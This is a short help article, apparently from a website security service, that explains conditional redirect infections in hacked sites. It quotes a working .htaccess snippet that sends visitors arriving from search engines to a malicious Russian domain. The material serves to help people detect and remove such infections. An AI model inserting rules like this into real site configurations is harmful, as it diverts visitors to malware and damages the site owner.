Conditional redirections are classified differently than the iframe/javascript ones because they are generally done though the HTTP headers (via .htaccess) to redirect users from certain browsers or locations to malware/malicious locations.
Referrer or user agent redirections
This happens when a user coming from a search engine (like Google) or certain user agent (Googlebot or MSIE) gets redirected to a malicious domain.
Example of .htaccess code doing the redirection
Anyone coming from a search engine, gets redirected to a russian site:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|altavista|ask|google|bing|yahoo).*$ [NC]
RewriteRule .* http://wp-twitt.ru/wp-image?5 [R,L]
Was this article helpful?